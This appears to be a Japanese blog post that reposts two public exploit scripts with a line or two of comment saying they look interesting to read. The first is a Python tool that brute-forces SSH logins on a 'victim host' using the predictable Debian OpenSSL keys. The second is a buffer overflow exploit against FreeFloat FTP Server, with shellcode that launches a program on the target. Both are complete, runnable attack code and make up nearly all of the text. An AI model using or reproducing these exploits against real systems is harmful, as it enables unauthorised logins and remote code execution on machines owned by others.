新しいソース
#!/bin/python # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, # MA 02110-1301, USA. ############################################################################ # Autor: hitz - WarCat team (warcat.no-ip.org) # Collaborator: pretoriano # # 1. Download http://www.exploit-db.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2 # # 2. Extract it to a directory # # 3. Execute the python script # - something like: python exploit.py /home/hitz/keys 192.168.1.240 root 22 5 # - execute: python exploit.py (without parameters) to display the help # - if the key is found, the script shows something like that: # Key Found in file: ba7a6b3be3dac7dcd359w20b4afd5143-1121 # Execute: ssh -lroot -p22 -i /home/hitz/keys/ba7a6b3be3dac7dcd359w20b4afd5143-1121 192.168.1.240 ############################################################################ import Queue import os import string import time from threading import Thread import sys #This class only has a boolean, which will be True if some thread find the key class End(): def __init__(self): self.end = False def Finish(self): self.end = True def GetEnd(self): return self.end #This is the thread class class Connection(Thread): def __init__(self,QueueDir,TheEnd,dir,host,user,port='22'): Thread.__init__(self) self.QueueDir = QueueDir self.TheEnd = TheEnd self.dir = dir self.host = host self.user = user self.port = port def run(self): while (not self.TheEnd.GetEnd()) and (not self.QueueDir.empty()): key = self.QueueDir.get() cmd = 'ssh -l ' + self.user cmd = cmd + ' -p ' + self.port cmd = cmd + ' -o PasswordAuthentication=no' cmd = cmd + ' -i ' + self.dir + '/' + key cmd = cmd + ' ' + self.host + ' exit; echo $?' pin,pout,perr = os.popen3(cmd, 'r') pin.close() #To debug descoment the next line. This will show the errors reported by ssh #print perr.read() if pout.read().lstrip().rstrip() == '0': self.TheEnd.Finish() print '' print 'Key Found in file: '+ key print 'Execute: ssh -l%s -p%s -i %s/%s %s' %(self.user,self.port,self.dir,key,self.host) print '' print '\n-OpenSSL Debian exploit- by ||WarCat team|| warcat.no-ip.org' if len(sys.argv) < 4: print './exploit.py <dir> <host> <user> [[port] [threads]]' print ' <dir>: Path to SSH privatekeys (ex. /home/john/keys) without final slash' print ' <host>: The victim host' print ' <user>: The user of the victim host' print ' [port]: The SSH port of the victim host (default 22)' print ' [threads]: Number of threads (default 4) Too big numer is bad' sys.exit(1) dir = sys.argv[1] host = sys.argv[2] user = sys.argv[3] if len(sys.argv) <= 4: port='22' threads=4 else: if len(sys.argv) <=5: port=sys.argv[4] threads = 4 else: port=sys.argv[4] threads = sys.argv[5] ListDir = os.listdir(dir) QueueDir=Queue.Queue() TheEnd = End() for i in range(len(ListDir)): if ListDir[i].find('.pub') == -1: QueueDir.put(ListDir[i]) initsize = QueueDir.qsize() tested = 0 for i in range(0,int(threads)): Connection(QueueDir,TheEnd,dir,host,user,port).start() while (not TheEnd.GetEnd()) and (not QueueDir.empty()): time.sleep(5) actsize = QueueDir.qsize() speed = (initsize - tested - actsize)/5 tested = initsize - actsize print 'Tested %i keys | Remaining %i keys | Aprox. Speed %i/sec' %(tested,actsize,speed) # milw0rm.com [2008-06-01] ||< これのソースが結構面白そうだから、 最初にどんなソースか読んでみようと思います。 >|python| #!/usr/bin/python # #[+]Exploit Title: FreeFloat FTP Server REST and PASV Buffer Overflow Exploit #[+]Date: 18\06\2011 #[+]Author: C4SS!0 G0M3S #[+]Software Link: http://www.freefloat.com/software/freefloatftpserver.zip #[+]Version: 1.00 #[+]Tested On: Windows XP SP3 Brazilian Portuguese #[+]CVE: N/A # # import errno from os import strerror from socket import * import sys from time import sleep from struct import pack if len(sys.argv) != 3: print "[-]Usage: python %s <ip> <port>" % sys.argv[0] print "[-]Exemple: python %s 192.168.1.2 21" % sys.argv[0] sys.exit(0) ip = sys.argv[1] port = int(sys.argv[2]) shellcode = ("\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1" "\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30" "\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa" "\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96"#Shellcode WinExec CALC "\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b"#Know badchars "\x00\xff\x0d\x0a\x3d\x20" "\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a" "\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83" "\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98" "\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61" "\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05" "\x7f\xe8\x7b\xca") buf = "\x41" * 246 buf += pack('<L',0x7C91FCD8)#JMP ESP in ntdll.dll buf += "\x90" * 20 buf += shellcode print "[+]Connecting with server..." sleep(1) try: s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port)) s.recv(2000) s.send("USER test\r\n") s.recv(2000) s.send("PASS test\r\n") s.recv(2000) s.send("REST "+buf+"\r\n") s.close() s = socket(AF_INET,SOCK_STREAM) s.connect((ip,port))#Server needs connect AGAIN to CRASH and ocorrs the buffer overflow bug. sleep(1)#Wait a segund s.close()#Close connection CRASH print "[+]Exploit sent with sucess" except: print "[*]Error in connection with server: "+ip
これもよさげ。